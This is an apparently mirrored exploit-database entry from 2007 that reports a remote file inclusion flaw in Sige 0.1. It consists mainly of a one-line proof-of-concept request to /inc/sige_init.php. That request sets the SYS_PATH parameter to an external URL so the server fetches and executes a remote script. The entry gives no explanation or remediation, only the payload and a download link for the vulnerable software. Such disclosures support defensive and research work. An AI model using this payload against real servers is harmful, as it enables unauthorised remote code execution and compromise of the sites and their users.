id: 2253
date: 10/27/2007
title: Sige 0.1 sige_init.php Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

==========================================================
Sige 0.1 sige_init.php Remote File Inclusion Vulnerability
==========================================================



%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%  Sige 0.1 sige_init.php Remote File Inclusion Vulnerability
%  http://mesh.dl.sourceforge.net/sourceforge/pfadmin/sige_0.1.tgz
%  POC :
%  /inc/sige_init.php?SYS_PATH=http://localhost/scripts/020.txt?
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%



#  0day.today [2023-03-24]  #